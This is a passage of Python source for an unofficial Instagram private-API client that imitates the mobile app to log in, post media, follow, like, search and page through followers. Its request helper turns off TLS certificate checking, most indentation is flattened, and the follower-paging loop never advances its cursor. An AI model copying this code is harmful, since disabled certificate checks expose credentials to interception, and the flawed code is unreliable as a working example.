_android_top_live_profile_pics_universe,ig_android_direct_phone_number_links,ig_android_stories_weblink_creation,ig_android_direct_search_new_thread_universe,ig_android_histogram_reporter,ig_android_direct_on_profile_universe,ig_android_network_cancellation,ig_android_background_reel_fetch,ig_android_react_native_insights,ig_android_insta_video_audio_encoder,ig_android_family_bridge_bookmarks,ig_android_data_usage_network_layer,ig_android_universal_instagram_deep_links,ig_android_dash_for_vod_universe,ig_android_modular_tab_discover_people_redesign,ig_android_mas_sticker_upsell_dialog_universe,ig_android_ad_add_per_event_counter_to_logging_event,ig_android_sticky_header_top_chrome_optimization,ig_android_rtl,ig_android_biz_conversion_page_pre_select,ig_android_promote_from_profile_button,ig_android_live_broadcaster_invite_universe,ig_android_share_spinner,ig_android_text_action,ig_android_own_reel_title_universe,ig_promotions_unit_in_insights_landing_page,ig_android_business_settings_header_univ,ig_android_save_longpress_tooltip,ig_android_cons
train_image_size_universe,ig_android_business_new_graphql_endpoint_universe,ig_ranking_following,ig_android_stories_profile_camera_entry_point,ig_android_universe_reel_video_production,ig_android_power_metrics,ig_android_sfplt,ig_android_offline_hashtag_feed,ig_android_live_skin_smooth,ig_android_direct_inbox_search,ig_android_stories_posting_offline_ui,ig_android_sidecar_video_upload_universe,ig_android_promotion_manager_entry_point_universe,ig_android_direct_reply_audience_upgrade,ig_android_swipe_navigation_x_angle_universe,ig_android_offline_mode_holdout,ig_android_live_send_user_location,ig_android_direct_fetch_before_push_notif,ig_android_non_square_first,ig_android_insta_video_drawing,ig_android_swipeablefilters_universe,ig_android_live_notification_control_universe,ig_android_analytics_logger_running_background_universe,ig_android_save_all,ig_android_reel_viewer_data_buffer_size,ig_direct_quality_holdout_universe,ig_android_family_bridge_discover,ig_android_react_native_restart_after_error_universe,ig_android_startup_manager,ig_story_tray_peek_content_universe,ig_android_profile,ig_android_high_res_upload_2,ig_android_http_service_same_thread,ig_android_scroll_to_dismiss_keyboard,ig_android_remove_followers_universe,ig_android_skip_video_render,ig_android_story_timestamps,ig_android_live_viewer_comment_prompt_universe,ig_profile_holdout_universe,ig_android_react_native_insights_grid_view,ig_stories_selfie_sticker,ig_android_stories_reply_composer_redesign,ig_android_streamline_page_creation,ig_explore_netego,ig_android_ig4b_connect_fb_button_universe,ig_android_feed_util_rect_optimization,ig_android_rendering_controls,ig_android_os_version_blocking,ig_android_encoder_width_safe_multiple_16,ig_search_new_bootstrap_holdout_universe,ig_android_snippets_profile_nux,ig_android_e2e_optimization_universe,ig_android_comments_logging_universe,ig_shopping_insights,ig_android_save_collections,ig_android_live_see_fewer_videos_like_this_universe,ig_android_show_new_contact_import_dialog,ig_android_live_view_profile_from_comments_universe,ig_fbns_blocked,ig_formats_and_feedbacks_holdout_universe,ig_android_reduce_view_pager_buffer,ig_android_instavideo_periodic_notif,ig_search_user_auto_complete_cache_sync_ttl,ig_android_marauder_update_frequency,ig_android_suggest_password_reset_on_oneclick_login,ig_android_promotion_entry_from_ads_manager_universe,ig_android_live_special_codec_size_list,ig_android_enable_share_to_messenger,ig_android_background_main_feed_fetch,ig_android_live_video_reactions_creation_universe,ig_android_channels_home,ig_android_sidecar_gallery_universe,ig_android_upload_reliability_universe,ig_migrate_mediav2_universe,ig_android_insta_video_broadcaster_infra_perf,ig_android_business_conversion_social_context,android_ig_fbns_kill_switch,ig_android_live_webrtc_livewith_consumption,ig_android_destroy_swipe_fragment,ig_android_react_native_universe_kill_switch,ig_android_stories_book_universe,ig_android_all_videoplayback_persisting_sound,ig_android_draw_eraser_universe,ig_direct_search_new_bootstrap_holdout_universe,ig_android_cache_layer_bytes_threshold,ig_android_search_hash_tag_and_username_universe,ig_android_business_promotion,ig_android_direct_search_recipients_controller_universe,ig_android_ad_show_full_name_universe,ig_android_anrwatchdog,ig_android_qp_kill_switch,ig_android_2fac,ig_direct_bypass_group_size_limit_universe,ig_android_promote_simplified_flow,ig_android_share_to_whatsapp,ig_android_hide_bottom_nav_bar_on_discover_people,ig_fbns_dump_ids,ig_android_hands_free_b
efore_reverse,ig_android_skywalker_live_event_start_end,ig_android_live_join_comment_ui_change,ig_android_direct_search_story_recipients_universe,ig_android_direct_full_size_gallery_upload,ig_android_ad_browser_gesture_control,ig_channel_server_experiments,ig_android_video_cover_frame_from_original_as_fallback,ig_android_ad_watchinstall_universe,ig_android_ad_viewability_logging_universe,ig_android_new_optic,ig_android_direct_visual_replies,ig_android_stories_search_reel_mentions_universe,ig_android_threaded_comments_universe,ig_android_mark_reel_seen_on_Swipe_forward,ig_internal_ui_for_lazy_loaded_modules_experiment,ig_fbns_shared,ig_android_capture_slowmo_mode,ig_android_live_viewers_list_search_bar,ig_android_video_single_surface,ig_android_offline_reel_feed,ig_android_video_download_logging,ig_android_last_edits,ig_android_exoplayer_4142,ig_android_post_live_viewer_count_privacy_universe,ig_android_activity_feed_click_state,ig_android_snippets_haptic_feedback,ig_android_gl_drawing_marks_after_undo_backing,ig_android_mark_seen_state_on_viewed_impression,ig_android_live_backgrounded_reminder_universe,ig_android_live_hide_viewer_nux_universe,ig_android_live_monotonic_pts,ig_android_search_top_search_surface_universe,ig_android_user_detail_endpoint,ig_android_location_media_count_exp_ig,ig_android_comment_tweaks_universe,ig_android_ad_watchmore_entry_point_universe,ig_android_top_live_notification_universe,ig_android_add_to_last_post,ig_save_insights,ig_android_live_enhanced_end_screen_universe,ig_android_ad_add_counter_to_logging_event,ig_android_blue_token_conversion_universe,ig_android_exoplayer_settings,ig_android_progressive_jpeg,ig_android_offline_story_stickers,ig_android_gqls_typing_indicator,ig_android_chaining_button_tooltip,ig_android_video_prefetch_for_connectivity_type,ig_android_use_exo_cache_for_progressive,ig_android_samsung_app_badging,ig_android_ad_holdout_watchandmore_universe,ig_android_offline_commenting,ig_direct_stories_recipient_picker_button,ig_insights_feedback_channel_universe,ig_android_insta_video_abr_resize,ig_android_insta_video_sound_always_on'''
SIG_KEY_VERSION = '4'
# username # Instagram username
# password # Instagram password
# debug # Debug
# uuid # UUID
# device_id # Device ID
# username_id # Username ID
# token # _csrftoken
# isLoggedIn # Session status
# rank_token # Rank token
# IGDataPath # Data storage path
def __init__(self, username, password, debug=False, IGDataPath=None):
m = hashlib.md5()
m.update(username.encode('utf-8') + password.encode('utf-8'))
self.device_id = self.generateDeviceId(m.hexdigest())
self.setUser(username, password)
self.isLoggedIn = False
self.LastResponse = None
self.s = requests.Session()
def setUser(self, username, password):
self.username = username
self.password = password
self.uuid = self.generateUUID(True)
def setProxy(self, proxy=None):
"""
Set proxy for all requests::
Proxy format - user:password@ip:port
"""
if proxy is not None:
print('Set proxy!')
proxies = {'http': 'http://' + proxy, 'https': 'http://' + proxy}
self.s.proxies.update(proxies)
def login(self, force=False):
if (not self.isLoggedIn or force):
if (self.SendRequest('si/fetch_headers/?challenge_type=signup&guid=' + self.generateUUID(False), None, True)):
data = {'phone_id': self.generateUUID(True),
'_csrftoken': self.LastResponse.cookies['csrftoken'],
'username': self.username,
'guid': self.uuid,
'device_id': self.device_id,
'password': self.password,
'login_attempt_count': '0'}
if (self.SendRequest('accounts/login/', self.generateSignature(json.dumps(data)), True)):
self.isLoggedIn = True
self.username_id = self.LastJson["logged_in_user"]["pk"]
self.rank_token = "%s_%s" % (self.username_id, self.uuid)
self.token = self.LastResponse.cookies["csrftoken"]
self.syncFeatures()
self.autoCompleteUserList()
self.timelineFeed()
self.getv2Inbox()
self.getRecentActivity()
print("Login success!\n")
return True
def syncFeatures(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'id': self.username_id,
'_csrftoken': self.token,
'experiments': self.EXPERIMENTS})
return self.SendRequest('qe/sync/', self.generateSignature(data))
def autoCompleteUserList(self):
return self.SendRequest('friendships/autocomplete_user_list/')
def timelineFeed(self):
return self.SendRequest('feed/timeline/')
def megaphoneLog(self):
return self.SendRequest('megaphone/log/')
def expose(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'id': self.username_id,
'_csrftoken': self.token,
'experiment': 'ig_android_profile_contextual_feed'})
return self.SendRequest('qe/expose/', self.generateSignature(data))
def logout(self):
        return self.SendRequest('accounts/logout/')
def uploadPhoto(self, photo, caption=None, upload_id=None, is_sidecar=None):
if upload_id is None:
upload_id = str(int(time.time() * 1000))
data = {'upload_id': upload_id,
'_uuid': self.uuid,
'_csrftoken': self.token,
'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})}
if is_sidecar:
data['is_sidecar'] = '1'
m = MultipartEncoder(data, boundary=self.uuid)
self.s.headers.update({'X-IG-Capabilities': '3Q4=',
'X-IG-Connection-Type': 'WIFI',
'Cookie2': '$Version=1',
'Accept-Language': 'en-US',
'Accept-Encoding': 'gzip, deflate',
'Content-type': m.content_type,
'Connection': 'close',
'User-Agent': self.USER_AGENT})
response = self.s.post(self.API_URL + "upload/photo/", data=m.to_string())
print(response)
        if response.status_code == 200:
            if self.configure(upload_id, photo, caption):
                self.expose()
                return True
        return False
def uploadVideo(self, video, thumbnail, caption=None, upload_id=None, is_sidecar=None):
if upload_id is None:
upload_id = str(int(time.time() * 1000))
data = {'upload_id': upload_id,
'_csrftoken': self.token,
'media_type': '2',
'_uuid': self.uuid}
if is_sidecar:
data['is_sidecar'] = '1'
m = MultipartEncoder(data, boundary=self.uuid)
self.s.headers.update({'X-IG-Capabilities': '3Q4=',
'X-IG-Connection-Type': 'WIFI',
'Host': 'i.instagram.com',
'Cookie2': '$Version=1',
'Accept-Language': 'en-US',
'Accept-Encoding': 'gzip, deflate',
'Content-type': m.content_type,
'Connection': 'keep-alive',
'User-Agent': self.USER_AGENT})
response = self.s.post(self.API_URL + "upload/video/", data=m.to_string())
if response.status_code == 200:
body = json.loads(response.text)
upload_url = body['video_upload_urls'][3]['url']
upload_job = body['video_upload_urls'][3]['job']
videoData = open(video, 'rb').read()
# solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method
request_size = int(math.floor(len(videoData) / 4))
lastRequestExtra = (len(videoData) - (request_size * 3))
headers = copy.deepcopy(self.s.headers)
self.s.headers.update({'X-IG-Capabilities': '3Q4=',
'X-IG-Connection-Type': 'WIFI',
'Cookie2': '$Version=1',
'Accept-Language': 'en-US',
'Accept-Encoding': 'gzip, deflate',
'Content-type': 'application/octet-stream',
'Session-ID': upload_id,
'Connection': 'keep-alive',
'Content-Disposition': 'attachment; filename="video.mov"',
'job': upload_job,
'Host': 'upload.instagram.com',
'User-Agent': self.USER_AGENT})
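            # send the raw video as four sequential byte-range chunks; the last
            # chunk absorbs the remainder so the ranges cover the file exactly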
for i in range(0, 4):
start = i * request_size
if i == 3:
end = i * request_size + lastRequestExtra
else:
end = (i + 1) * request_size
length = lastRequestExtra if i == 3 else request_size
content_range = "bytes {start}-{end}/{lenVideo}".format(start=start, end=(end - 1),
lenVideo=len(videoData)).encode('utf-8')
self.s.headers.update({'Content-Length': str(end - start), 'Content-Range': content_range, })
response = self.s.post(upload_url, data=videoData[start:start + length])
self.s.headers = headers
        if response.status_code == 200:
            if self.configureVideo(upload_id, video, thumbnail, caption):
                self.expose()
                return True
        return False
def uploadAlbum(self, media, caption=None, upload_id=None):
if not media:
raise Exception("List of media to upload can't be empty.")
if len(media) < 2 or len(media) > 10:
raise Exception('Instagram requires that albums contain 2-10 items. You tried to submit {}.'.format(len(media)))
# Figure out the media file details for ALL media in the album.
# NOTE: We do this first, since it validates whether the media files are
# valid and lets us avoid wasting time uploading totally invalid albums!
for idx, item in enumerate(media):
            if not item.get('file', '') or not item.get('type', ''):
raise Exception('Media at index "{}" does not have the required "file" and "type" keys.'.format(idx))
# $itemInternalMetadata = new InternalMetadata();
# If usertags are provided, verify that the entries are valid.
if item.get('usertags', []):
self.throwIfInvalidUsertags(item['usertags'])
# Pre-process media details and throw if not allowed on Instagram.
if item.get('type', '') == 'photo':
# Determine the photo details.
# $itemInternalMetadata->setPhotoDetails(Constants::FEED_TIMELINE_ALBUM, $item['file']);
pass
elif item.get('type', '') == 'video':
# Determine the video details.
# $itemInternalMetadata->setVideoDetails(Constants::FEED_TIMELINE_ALBUM, $item['file']);
pass
else:
raise Exception('Unsupported album media type "{}".'.format(item['type']))
itemInternalMetadata = {}
item['internalMetadata'] = itemInternalMetadata
# Perform all media file uploads.
for idx, item in enumerate(media):
itemInternalMetadata = item['internalMetadata']
item_upload_id = self.generateUploadId()
if item.get('type', '') == 'photo':
self.uploadPhoto(item['file'], caption=caption, is_sidecar=True, upload_id=item_upload_id)
# $itemInternalMetadata->setPhotoUploadResponse($this->ig->internal->uploadPhotoData(Constants::FEED_TIMELINE_ALBUM, $itemInternalMetadata));
elif item.get('type', '') == 'video':
# Attempt to upload the video data.
self.uploadVideo(item['file'], item['thumbnail'], caption=caption, is_sidecar=True, upload_id=item_upload_id)
# $itemInternalMetadata = $this->ig->internal->uploadVideo(Constants::FEED_TIMELINE_ALBUM, $item['file'], $itemInternalMetadata);
# Attempt to upload the thumbnail, associated with our video's ID.
# $itemInternalMetadata->setPhotoUploadResponse($this->ig->internal->uploadPhotoData(Constants::FEED_TIMELINE_ALBUM, $itemInternalMetadata));
pass
item['internalMetadata']['upload_id'] = item_upload_id
albumInternalMetadata = {}
return self.configureTimelineAlbum(media, albumInternalMetadata, captionText=caption)
def throwIfInvalidUsertags(self, usertags):
for user_position in usertags:
# Verify this usertag entry, ensuring that the entry is format
# ['position'=>[0.0,1.0],'user_id'=>'123'] and nothing else.
correct = True
if isinstance(user_position, dict):
position = user_position.get('position', None)
user_id = user_position.get('user_id', None)
if isinstance(position, list) and len(position) == 2:
try:
x = float(position[0])
y = float(position[1])
if x < 0.0 or x > 1.0:
correct = False
if y < 0.0 or y > 1.0:
correct = False
except:
correct = False
try:
                    user_id = int(user_id)  # Python 3: 'long' was merged into 'int'
if user_id < 0:
correct = False
except:
correct = False
if not correct:
raise Exception('Invalid user entry in usertags array.')
def configureTimelineAlbum(self, media, albumInternalMetadata, captionText='', location=None):
endpoint = 'media/configure_sidecar/'
albumUploadId = self.generateUploadId()
date = datetime.utcnow().isoformat()
childrenMetadata = []
for item in media:
itemInternalMetadata = item['internalMetadata']
uploadId = itemInternalMetadata.get('upload_id', self.generateUploadId())
if item.get('type', '') == 'photo':
# Build this item's configuration.
photoConfig = {'date_time_original': date,
'scene_type': 1,
'disable_comments': False,
'upload_id': uploadId,
'source_type': 0,
'scene_capture_type': 'standard',
'date_time_digitized': date,
'geotag_enabled': False,
'camera_position': 'back',
'edits': {'filter_strength': 1,
'filter_name': 'IGNormalFilter'}
}
# This usertag per-file EXTERNAL metadata is only supported for PHOTOS!
if item.get('usertags', []):
# NOTE: These usertags were validated in Timeline::uploadAlbum.
photoConfig['usertags'] = json.dumps({'in': item['usertags']})
childrenMetadata.append(photoConfig)
if item.get('type', '') == 'video':
# Get all of the INTERNAL per-VIDEO metadata.
videoDetails = itemInternalMetadata.get('video_details', {})
# Build this item's configuration.
videoConfig = {'length': videoDetails.get('duration', 1.0),
'date_time_original': date,
'scene_type': 1,
'poster_frame_index': 0,
'trim_type': 0,
'disable_comments': False,
'upload_id': uploadId,
'source_type': 'library',
'geotag_enabled': False,
'edits': {
'length': videoDetails.get('duration', 1.0),
'cinema': 'unsupported',
'original_length': videoDetails.get('duration', 1.0),
'source_type': 'library',
'start_time': 0,
'camera_position': 'unknown',
'trim_type': 0}
}
childrenMetadata.append(videoConfig)
# Build the request...
data = {'_csrftoken': self.token,
'_uid': self.username_id,
'_uuid': self.uuid,
'client_sidecar_id': albumUploadId,
'caption': captionText,
'children_metadata': childrenMetadata}
self.SendRequest(endpoint, self.generateSignature(json.dumps(data)))
response = self.LastResponse
if response.status_code == 200:
self.LastResponse = response
self.LastJson = json.loads(response.text)
return True
else:
print("Request return " + str(response.status_code) + " error!")
# for debugging
try:
self.LastResponse = response
self.LastJson = json.loads(response.text)
except:
pass
return False
def direct_share(self, media_id, recipients, text=None):
        if not isinstance(recipients, list):  # normalize a single recipient to a list
recipients = [str(recipients)]
recipient_users = '"",""'.join(str(r) for r in recipients)
endpoint = 'direct_v2/threads/broadcast/media_share/?media_type=photo'
boundary = self.uuid
bodies = [
{
'type': 'form-data',
'name': 'media_id',
'data': media_id,
},
{
'type': 'form-data',
'name': 'recipient_users',
'data': '[["{}"]]'.format(recipient_users),
},
{
'type': 'form-data',
'name': 'client_context',
'data': self.uuid,
},
{
'type': 'form-data',
'name': 'thread',
'data': '["0"]',
},
{
'type': 'form-data',
'name': 'text',
'data': text or '',
},
]
data = self.buildBody(bodies, boundary)
self.s.headers.update({'User-Agent': self.USER_AGENT,
'Proxy-Connection': 'keep-alive',
'Connection': 'keep-alive',
'Accept': '*/*',
'Content-Type': 'multipart/form-data; boundary={}'.format(boundary),
'Accept-Language': 'en-en'})
# self.SendRequest(endpoint,post=data) #overwrites 'Content-type' header and boundary is missed
response = self.s.post(self.API_URL + endpoint, data=data)
if response.status_code == 200:
self.LastResponse = response
self.LastJson = json.loads(response.text)
return True
else:
print("Request return " + str(response.status_code) + " error!")
# for debugging
try:
self.LastResponse = response
self.LastJson = json.loads(response.text)
except:
pass
return False
def configureVideo(self, upload_id, video, thumbnail, caption=''):
clip = VideoFileClip(video)
self.uploadPhoto(photo=thumbnail, caption=caption, upload_id=upload_id)
data = json.dumps({
'upload_id': upload_id,
'source_type': 3,
'poster_frame_index': 0,
'length': 0.00,
'audio_muted': False,
'filter_type': 0,
'video_result': 'deprecated',
'clips': {
'length': clip.duration,
'source_type': '3',
'camera_position': 'back',
},
'extra': {
'source_width': clip.size[0],
'source_height': clip.size[1],
},
            'device': self.DEVICE_SETTINGS,
'_csrftoken': self.token,
'_uuid': self.uuid,
'_uid': self.username_id,
'caption': caption,
})
return self.SendRequest('media/configure/?video=1', self.generateSignature(data))
def configure(self, upload_id, photo, caption=''):
(w, h) = getImageSize(photo)
data = json.dumps({'_csrftoken': self.token,
'media_folder': 'Instagram',
'source_type': 4,
'_uid': self.username_id,
'_uuid': self.uuid,
'caption': caption,
'upload_id': upload_id,
                           'device': self.DEVICE_SETTINGS,
'edits': {
'crop_original_size': [w * 1.0, h * 1.0],
'crop_center': [0.0, 0.0],
'crop_zoom': 1.0
},
'extra': {
'source_width': w,
'source_height': h
}})
return self.SendRequest('media/configure/?', self.generateSignature(data))
def editMedia(self, mediaId, captionText=''):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'caption_text': captionText})
return self.SendRequest('media/' + str(mediaId) + '/edit_media/', self.generateSignature(data))
def removeSelftag(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('media/' + str(mediaId) + '/remove/', self.generateSignature(data))
def mediaInfo(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'media_id': mediaId})
return self.SendRequest('media/' + str(mediaId) + '/info/', self.generateSignature(data))
def deleteMedia(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'media_id': mediaId})
return self.SendRequest('media/' + str(mediaId) + '/delete/', self.generateSignature(data))
def changePassword(self, newPassword):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'old_password': self.password,
'new_password1': newPassword,
'new_password2': newPassword})
return self.SendRequest('accounts/change_password/', self.generateSignature(data))
def explore(self):
return self.SendRequest('discover/explore/')
def comment(self, mediaId, commentText):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'comment_text': commentText})
return self.SendRequest('media/' + str(mediaId) + '/comment/', self.generateSignature(data))
def deleteComment(self, mediaId, commentId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('media/' + str(mediaId) + '/comment/' + str(commentId) + '/delete/', self.generateSignature(data))
def changeProfilePicture(self, photo):
# TODO Instagram.php 705-775
return False
def removeProfilePicture(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('accounts/remove_profile_picture/', self.generateSignature(data))
def setPrivateAccount(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('accounts/set_private/', self.generateSignature(data))
def setPublicAccount(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('accounts/set_public/', self.generateSignature(data))
def getProfileData(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('accounts/current_user/?edit=true', self.generateSignature(data))
def editProfile(self, url, phone, first_name, biography, email, gender):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'external_url': url,
'phone_number': phone,
'username': self.username,
'full_name': first_name,
'biography': biography,
'email': email,
'gender': gender})
return self.SendRequest('accounts/edit_profile/', self.generateSignature(data))
def getUsernameInfo(self, usernameId):
return self.SendRequest('users/' + str(usernameId) + '/info/')
def getSelfUsernameInfo(self):
return self.getUsernameInfo(self.username_id)
def getSelfSavedMedia(self):
return self.SendRequest('feed/saved')
def getRecentActivity(self):
activity = self.SendRequest('news/inbox/?')
return activity
def getFollowingRecentActivity(self):
activity = self.SendRequest('news/?')
return activity
def getv2Inbox(self):
inbox = self.SendRequest('direct_v2/inbox/?')
return inbox
def getv2Threads(self, thread, cursor=None):
endpoint = 'direct_v2/threads/{0}'.format(thread)
if cursor is not None:
endpoint += '?cursor={0}'.format(cursor)
inbox = self.SendRequest(endpoint)
return inbox
def getUserTags(self, usernameId):
tags = self.SendRequest('usertags/' + str(usernameId) + '/feed/?rank_token=' + str(self.rank_token) + '&ranked_content=true&')
return tags
def getSelfUserTags(self):
return self.getUserTags(self.username_id)
def tagFeed(self, tag):
userFeed = self.SendRequest('feed/tag/' + str(tag) + '/?rank_token=' + str(self.rank_token) + '&ranked_content=true&')
return userFeed
def getMediaLikers(self, mediaId):
likers = self.SendRequest('media/' + str(mediaId) + '/likers/?')
return likers
def getGeoMedia(self, usernameId):
locations = self.SendRequest('maps/user/' + str(usernameId) + '/')
return locations
def getSelfGeoMedia(self):
return self.getGeoMedia(self.username_id)
def fbUserSearch(self, query):
query = self.SendRequest('fbsearch/topsearch/?context=blended&query=' + str(query) + '&rank_token=' + str(self.rank_token))
return query
def searchUsers(self, query):
query = self.SendRequest('users/search/?ig_sig_key_version=' + str(self.SIG_KEY_VERSION) + '&is_typeahead=true&query=' + str(query) + '&rank_token=' + str(self.rank_token))
return query
def searchUsername(self, usernameName):
query = self.SendRequest('users/' + str(usernameName) + '/usernameinfo/')
return query
def syncFromAdressBook(self, contacts):
return self.SendRequest('address_book/link/?include=extra_display_name,thumbnails', "contacts=" + json.dumps(contacts))
def searchTags(self, query):
query = self.SendRequest('tags/search/?is_typeahead=true&q=' + str(query) + '&rank_token=' + str(self.rank_token))
return query
def getTimeline(self):
query = self.SendRequest('feed/timeline/?rank_token=' + str(self.rank_token) + '&ranked_content=true&')
return query
def getUserFeed(self, usernameId, maxid='', minTimestamp=None):
query = self.SendRequest('feed/user/%s/?max_id=%s&min_timestamp=%s&rank_token=%s&ranked_content=true'
% (usernameId, maxid, minTimestamp, self.rank_token))
return query
def getSelfUserFeed(self, maxid='', minTimestamp=None):
return self.getUserFeed(self.username_id, maxid, minTimestamp)
def getHashtagFeed(self, hashtagString, maxid=''):
return self.SendRequest('feed/tag/' + hashtagString + '/?max_id=' + str(maxid) + '&rank_token=' + self.rank_token + '&ranked_content=true&')
def searchLocation(self, query):
locationFeed = self.SendRequest('fbsearch/places/?rank_token=' + str(self.rank_token) + '&query=' + str(query))
return locationFeed
def getLocationFeed(self, locationId, maxid=''):
return self.SendRequest('feed/location/' + str(locationId) + '/?max_id=' + maxid + '&rank_token=' + self.rank_token + '&ranked_content=true&')
def getPopularFeed(self):
popularFeed = self.SendRequest('feed/popular/?people_teaser_supported=1&rank_token=' + str(self.rank_token) + '&ranked_content=true&')
return popularFeed
def getUserFollowings(self, usernameId, maxid=''):
url = 'friendships/' + str(usernameId) + '/following/?'
query_string = {'ig_sig_key_version': self.SIG_KEY_VERSION,
'rank_token': self.rank_token}
if maxid:
query_string['max_id'] = maxid
if sys.version_info.major == 3:
url += urllib.parse.urlencode(query_string)
else:
url += urllib.urlencode(query_string)
return self.SendRequest(url)
def getSelfUsersFollowing(self):
return self.getUserFollowings(self.username_id)
def getUserFollowers(self, usernameId, maxid=''):
if maxid == '':
return self.SendRequest('friendships/' + str(usernameId) + '/followers/?rank_token=' + self.rank_token)
else:
return self.SendRequest('friendships/' + str(usernameId) + '/followers/?rank_token=' + self.rank_token + '&max_id=' + str(maxid))
def getSelfUserFollowers(self):
return self.getUserFollowers(self.username_id)
def like(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'media_id': mediaId})
return self.SendRequest('media/' + str(mediaId) + '/like/', self.generateSignature(data))
def unlike(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'media_id': mediaId})
return self.SendRequest('media/' + str(mediaId) + '/unlike/', self.generateSignature(data))
def getMediaComments(self, mediaId, max_id=''):
return self.SendRequest('media/' + mediaId + '/comments/?max_id=' + max_id)
def setNameAndPhone(self, name='', phone=''):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'first_name': name,
'phone_number': phone,
'_csrftoken': self.token})
return self.SendRequest('accounts/set_phone_and_name/', self.generateSignature(data))
def getDirectShare(self):
return self.SendRequest('direct_share/inbox/?')
def backup(self):
# TODO Instagram.php 1470-1485
return False
def follow(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/create/' + str(userId) + '/', self.generateSignature(data))
def unfollow(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/destroy/' + str(userId) + '/', self.generateSignature(data))
def block(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/block/' + str(userId) + '/', self.generateSignature(data))
def unblock(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/unblock/' + str(userId) + '/', self.generateSignature(data))
def userFriendship(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/show/' + str(userId) + '/', self.generateSignature(data))
def getLikedMedia(self, maxid=''):
return self.SendRequest('feed/liked/?max_id=' + str(maxid))
def generateSignature(self, data, skip_quote=False):
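        # Sign the payload with HMAC-SHA256 keyed by IG_SIG_KEY and emit it as
        # 'ig_sig_key_version=<v>&signed_body=<hexdigest>.<quoted payload>'.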
if not skip_quote:
try:
parsedData = urllib.parse.quote(data)
except AttributeError:
parsedData = urllib.quote(data)
else:
parsedData = data
return 'ig_sig_key_version=' + self.SIG_KEY_VERSION + '&signed_body=' + hmac.new(self.IG_SIG_KEY.encode('utf-8'), data.encode('utf-8'), hashlib.sha256).hexdigest() + '.' + parsedData
def generateDeviceId(self, seed):
volatile_seed = "12345"
m = hashlib.md5()
m.update(seed.encode('utf-8') + volatile_seed.encode('utf-8'))
return 'android-' + m.hexdigest()[:16]
def generateUUID(self, type):
generated_uuid = str(uuid.uuid4())
if (type):
return generated_uuid
else:
return generated_uuid.replace('-', '')
def generateUploadId(self):
return str(calendar.timegm(datetime.utcnow().utctimetuple()))
def buildBody(self, bodies, boundary):
body = u''
for b in bodies:
body += u'--{boundary}\r\n'.format(boundary=boundary)
body += u'Content-Disposition: {b_type}; name="{b_name}"'.format(b_type=b['type'], b_name=b['name'])
_filename = b.get('filename', None)
_headers = b.get('headers', None)
if _filename:
_filename, ext = os.path.splitext(_filename)
                body += u'; filename="pending_media_{uid}.{ext}"'.format(uid=self.generateUploadId(), ext=ext)
if _headers and isinstance(_headers, list):
for h in _headers:
                    body += u'\r\n{header}'.format(header=h)
body += u'\r\n\r\n{data}\r\n'.format(data=b['data'])
body += u'--{boundary}--'.format(boundary=boundary)
return body
def SendRequest(self, endpoint, post=None, login=False):
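        # Central request helper: applies the mobile-app headers, retries
        # forever (60 s pause) on transport errors, and stores the parsed JSON
        # of the last response in self.LastJson.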
verify = False # don't show request warning
if (not self.isLoggedIn and not login):
raise Exception("Not logged in!\n")
self.s.headers.update({'Connection': 'close',
'Accept': '*/*',
'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Cookie2': '$Version=1',
'Accept-Language': 'en-US',
'User-Agent': self.USER_AGENT})
while True:
try:
if (post is not None):
response = self.s.post(self.API_URL + endpoint, data=post, verify=verify)
else:
response = self.s.get(self.API_URL + endpoint, verify=verify)
break
except Exception as e:
print('Except on SendRequest (wait 60 sec and resend): ' + str(e))
time.sleep(60)
if response.status_code == 200:
self.LastResponse = response
self.LastJson = json.loads(response.text)
return True
else:
print("Request return " + str(response.status_code) + " error!")
# for debugging
try:
self.LastResponse = response
self.LastJson = json.loads(response.text)
print(self.LastJson)
except:
pass
return False
def getTotalFollowers(self, usernameId):
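        # page through the followers endpoint via next_max_id until the server
        # reports big_list == False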
followers = []
next_max_id = ''
while 1:
self.getUserFollowers(usernameId, next_max_id)
temp = self.LastJson
for item in temp["users"]:
followers.append(item)
if temp["big_list"] is False:
return followers
